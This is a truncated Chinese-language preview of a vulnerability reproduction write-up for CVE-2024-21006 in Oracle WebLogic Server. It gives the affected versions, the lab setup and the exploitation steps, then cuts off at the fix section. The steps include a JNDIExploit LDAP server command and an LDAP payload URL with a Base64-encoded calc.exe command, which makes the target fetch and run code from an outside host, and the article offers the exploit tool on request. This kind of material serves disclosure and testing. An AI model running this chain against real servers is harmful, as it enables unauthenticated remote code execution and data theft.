文章预览
欢迎转发,请勿抄袭 Oracle WebLogic Server 产品中存在漏洞。受影响的受支持版本为 12.2.1.4.0 和 14.1.1.0.0。易于利用的漏洞允许未经身份验证的攻击者通过 T3、IIOP 进行网络访问来破坏 Oracle WebLogic Server。成功攻击此漏洞可能会导致对关键数据的未经授权的访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。 1 环境搭建 jdk版本1.8.0_162。 WebLogic Server 版本: 14.1.1.0.0 2 复现步骤 1、使用 JNDIExploit-1.4-SNAPSHOT.jar利用服务。 java -jar JNDIExploit-1 .4-SNAPSHOT .jar -i 192 .168 .8 .155 2、使用漏洞利用工具weblogic.jar。运行环境在jdk1.8。 3、根据提示填写对应参数。测试payload为弹出计算器 ldap: //192.168.8.155:1389/Basic/Command/Base64/Y2FsYy5leGU= 4、发送后检查,ldap请求,成功弹出计算器。 工具获取:回复“CVE-2024-21006” 3 修复方案 1、官方修复方案
………………………………
